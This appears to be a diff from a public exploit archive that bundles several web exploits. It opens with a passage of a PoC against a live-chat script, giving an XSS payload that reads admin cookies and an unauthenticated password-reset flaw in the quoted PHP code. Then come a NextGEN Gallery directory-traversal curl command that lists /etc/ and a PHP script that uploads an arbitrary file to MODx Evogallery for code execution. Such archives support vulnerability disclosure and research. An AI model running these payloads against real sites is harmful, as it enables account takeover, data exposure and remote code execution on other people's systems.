PoC-Exploit
==========================
// Non-Persistent XSS with "callback" Parameter in
/include/proactive_cross.php
(1) Under "callback" set your GET Parameter Callback to
"><script>alert(document.cookie)</script>
The Non-Persistent XSS will be executed for the Administrator in the
browser (he directly logged in because you chatting with him)
// Remote Change Password - with "Forgot.php"
http://[target]/rhino/operator/index.php?p=forgot
(1) in the forgot file there's no condition if the user logged in or not,
so we can look deeply in the file in line (27-67)
if ($_SERVER["REQUEST_METHOD"] == 'POST' && isset($_POST['newP'])) {
$defaults = $_POST;
$femail = filter_var($_POST['f_email'], FILTER_SANITIZE_EMAIL);
$pass = $_POST['f_pass'];
$newpass = $_POST['f_newpass'];
if ($pass != $newpass) {
$errors['e1'] = $tl['error']['e10'];
} elseif (strlen($pass) <= '5') {
$errors['e1'] = $tl['error']['e11'];
}
if ($defaults['f_email'] == '' || !filter_var($defaults['f_email'],
FILTER_VALIDATE_EMAIL)) {
$errors['e'] = $tl['error']['e3'];
}
$fwhen = 0;
$user_check = $lsuserlogin->lsForgotpassword($femail, $fwhen);
if ($user_check == true && count($errors) == 0) {
// The new password encrypt with hash_hmac
$passcrypt = hash_hmac('sha256', $pass, DB_PASS_HASH);
$result2 = $lsdb->query('UPDATE '.DB_PREFIX.'user SET password =
"'.$passcrypt.'", forgot = 0 WHERE email = "'.smartsql($femail).'"');
$result = $lsdb->query('SELECT username FROM '.DB_PREFIX.'user WHERE
email = "'.smartsql($femail).'" LIMIT 1');
$row = $result->fetch_assoc();
if (!$result) {
ls_redirect(JAK_PARSE_ERROR);
} else {
$lsuserlogin->lsLogin($row['username'], $pass, 0);
ls_redirect(BASE_URL);
}
} else {
$errorsf = $errors;
}
}
So there is an MySQL Query to execute if the email in the database (Show up
the change password settings).
ALL YOU HAVE TO DO IS DISCOVER THE E-MAIL ADDRESS THAT PUTTED WHEN ADMIN
INSTALLED THE SCRIPT.

9
platforms/php/webapps/39100.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/65637/info
The NextGEN Gallery plugin for WordPress is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.
Exploiting this issue can allow an attacker to obtain sensitive information that could aid in further attacks.
NextGEN Gallery 2.0.0 is vulnerable; other versions may also be affected.
curl -i -d 'dir=/etc/' http://www.example.com/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/nextgen_addgallery_page/static/jquery.filetree/connectors/jqueryFileTree.php

17
platforms/php/webapps/39101.php Executable file
View file

@ -0,0 +1,17 @@
source: http://www.securityfocus.com/bid/65646/info
MODx Evogallery module is prone to an arbitrary file upload vulnerability.
An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.
<?php
$uploadfile="file.php";
$ch = curl_init("demo.ltd/assets/modules/evogallery/js/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>